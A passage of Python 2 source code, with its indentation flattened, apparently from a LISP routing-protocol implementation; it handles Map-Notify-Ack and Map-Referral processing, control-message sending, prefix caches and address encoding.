lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
#endof
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
# Process each EID record in Map-Reply message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
# Check for Map-Referral looping. If there is no loop cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (self.cache[ml].entries.has_key(key) == False):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (self.cache.has_key(ml_key) == False): return(None)
if (self.cache[ml_key].entries.has_key(key) == False): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in self.cache[ml].entries.values():
if (prefix.is_more_specific(entry.eid)): found = entry
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in self.cache[ml].entries.values():
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = len(t) / 2
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
